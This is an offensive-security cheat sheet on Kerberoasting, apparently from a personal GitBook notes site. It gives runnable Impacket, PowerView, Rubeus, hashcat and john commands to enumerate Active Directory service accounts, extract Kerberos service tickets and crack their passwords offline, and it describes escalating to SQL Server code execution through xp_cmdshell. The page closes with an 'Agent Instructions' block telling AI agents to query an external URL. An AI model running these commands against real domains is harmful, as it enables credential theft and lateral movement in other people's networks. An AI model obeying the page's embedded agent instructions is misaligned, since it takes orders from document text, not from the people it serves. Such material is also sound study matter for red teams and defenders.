# Kerberoasting
## ABOUT
**Kerberoasting** is a **lateral movement/privilege escalation technique** in Active Directory environments. This attack targets **Service Principal Name (SPN)** accounts.
Domain accounts are often used to run services to overcome the network authentication limitations of built-in accounts such as **`NT AUTHORITY\LOCAL SERVICE`**.
> **Any domain user can request a Kerberos ticket for any service account in the same domain.**
It works because in Kerberos protocol if you have TGT, KDC implies you are honest domain member, so it can give you ST (which is encrypted with Service Account's password). But then if you would try to access service, Service will check UAC and ACL, and deny you're access. The vulnerability is that any user can ask for TGS, and because of it we can.
***
1. **Look for juicy Kerberoastable account with SPN's to use.**
2. **Extract TGS Tickets.**
3. **Crack it and get a creds (You can't use hash for PtH, only crack it).**
***
This is also possible across forest trusts if authentication is permitted across the trust boundary.
If the password for a domain SQL Server service account is cracked, you are likely to find yourself as a local admin on multiple servers, if not Domain Admin. Even if cracking a ticket obtained via a Kerberoasting attack gives a low-privilege user account, we can use it to craft service tickets for the service specified in the SPN. For example, if the SPN is set to MSSQL/SRV01, we can access the MSSQL service as sysadmin, enable the xp\_cmdshell extended procedure and gain code execution on the target SQL server.
### Requirements
We could execute Kerberoasting from various setups like (**shell / creds are must-have**):
* Non-domain Linux machine (**Impacket, netexec, hashcat, john, etc**).
* Non-domain Windows machine (**using runas /netonly**).
* Domain-joined Windows machine (**PowerView, Rubeus, Mimikatz, setspn.exe, etc**)
## LINUX
### GetUserSPNs
> **Use** `-outputfile` **parameter for output into a file**
#### List SPN Accounts
```bash
impacket-GetUserSPNs -dc-ip 13.13.13.13 MILITECH.LOCAL/sol.reed
```
#### Request all TGS Tickets
```bash
impacket-GetUserSPNs -dc-ip 13.13.13.13 MILITECH.LOCAL/sol.reed -request
```
#### Target Specific User
```bash
impacket-GetUserSPNs -dc-ip 13.13.13.13 MILITECH.LOCAL/sol.reed -request-user songbird
```
> With `-target-domain` parameter we can do Cross-Forest Kerberoasting
## WINDOWS
### PowerView
#### Extract TGS Tickets
```powershell
PS C:\> Import-Module .\PowerView.ps1
PS C:\> Get-DomainUser * -spn | select samaccountname
```
#### Target Specific User
```powershell
PS C:\> Get-DomainUser -Identity sqldev | Get-DomainSPNTicket -Format Hashcat
```
#### Extract all Tickets to CSV
```powershell
Get-DomainUser * -SPN | Get-DomainSPNTicket -Format Hashcat | Export-Csv .\crack_tgs.csv -NoTypeInformation
```
### Rubeus
#### Stats
```powershell
PS C:\> .\Rubeus.exe kerberoast /stats
```
#### Target High-Value Accounts
```powershell
PS C:\> .\Rubeus.exe kerberoast /ldapfilter:'admincount=1' /nowrap
```
#### Target Specific User
```powershell
PS C:\> .\Rubeus.exe kerberoast /user:testuser /nowrap # For RC4 only, use /tgtdeleg
```
> With `-Domain` parameter we can do Cross-Forest Kerberoasting
## CRACKING
> **IF YOU ARE ON WINDOWS SERVER 2016 OR EARLIER SPECIFY HASH IN RC4 ALGORITHM BECAUSE IT'S EASIER TO CRACK. IF YOU ARE ABOVE 2016's THEN YOU WILL BE DEALING WITH AES ENCRYPTION.**
> **IF HASH BEGINS WITH** `$krb5tgs$23$*` **THIS IS RC4 HASH**
#### Checking Supported Encryption Types
```powershell
PS C:\> Get-DomainUser testuser -Properties samaccountname,serviceprincipalname,msds-supportedencryptiontypes
```
### Hashcat
#### 1. Convert kirbi to Crackable format
```bash
python2.7 kirbi2john.py sqldev.kirbi > crack_tgs_unprocessed
```
#### 2. Modifying file for Hashcat
```bash
sed 's/\$krb5tgs\$\(.*\):\(.*\)/\$krb5tgs\$23\$\*\1\*\$\2/' crack_tgs_unprocessed > crack_tgs
```
#### 3. Run Hashcat
```bash
hashcat -m 13100 crack_tgs /usr/share/wordlists/rockyou.txt # 13100 mode is for RC4
```
### John
#### 1. Convert kirbi to Crackable format
```bash
python2.7 kirbi2john.py sqldev.kirbi > crack_tgs
```
#### 2. Run John
```bash
john --wordlist=/usr/share/wordlists/rockyou.txt crack_tgs
```
## RESOURCES
{% embed url="" %}
{% embed url="" %}
{% embed url="" %}
---
# Agent Instructions: Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.
Perform an HTTP GET request on the current page URL with the `ask` query parameter:
```
GET https://venator17.gitbook.io/bibliotheque/active-directory/movement/kerberos/kerberoasting.md?ask=
```
The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.
Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.